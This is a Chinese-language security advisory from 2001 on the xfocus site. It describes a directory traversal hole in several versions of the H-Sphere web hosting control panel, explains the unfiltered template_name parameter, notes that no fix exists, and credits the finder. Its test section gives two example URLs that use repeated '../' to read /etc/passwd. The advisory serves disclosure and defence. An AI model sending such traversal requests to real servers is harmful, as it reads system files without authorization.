xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

H-Sphere存在任意文件可查看漏洞


发布时间:2001-09-27
更新时间:2001-09-27
严重程度:
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Positive Software H-Sphere 1.5
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
Positive Software H-Sphere 2.06
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
Positive Software H-Sphere 2.05
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
Positive Software H-Sphere 2.0
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
详细描述
H-Sphere 提供跨多个服务器对WEB HOSTING自动操作,是一个运行在多系统下的商业产品,支持APACHE和IIS。

其中没有对某些请求中的'../'进行很好的过滤,可以导致恶意用户提交恶意请求而获得WEB ROOT目录以外的文件内容。

测试代码
http://www.target.com/some-path/psoft.hsphere.CP/some-path/?template_name=../../../../../../../../../../../../etc/passwd

http://www.target.com/shiva/psoft.hsphere.CP/admin/2628_0/?template_name=../../../../../../../../../../../../etc/passwd

解决方案
尚无

相关信息
Crazy Einstein <crazy_einstein@yahoo.com>.